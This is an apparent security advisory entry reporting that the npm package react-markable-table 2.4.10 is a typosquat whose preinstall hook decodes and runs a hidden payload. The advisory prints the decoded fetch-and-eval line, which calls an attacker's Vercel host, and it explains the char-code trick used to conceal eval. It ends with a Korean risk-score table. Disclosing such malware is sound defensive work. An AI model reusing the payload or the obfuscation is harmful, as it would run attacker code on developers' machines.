Malicious code in react-markable-table (npm)
-= Per source details. Do not edit below this line.=-
react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field wooorm/markdown-table). package.json declares a preinstall hook that runs node index.d.js. That script base64-decodes an embedded payload which resolves to eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text())), and invokes it via globalThis[tag](text) where tag is reconstructed from the char-code array [101,118,97,108] (spelling eval). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at npm install time.
왜 이 VPI인가 (설명가능 · 실험적)
VPI 산정 기준
| 영향도(기본값(정보 없음)) | 55.00 |
| 악용 신호(추가 악용신호 없음) | ×1.00 |
| VPI | 55.00 |
VPI 공식 vpi-v1 기준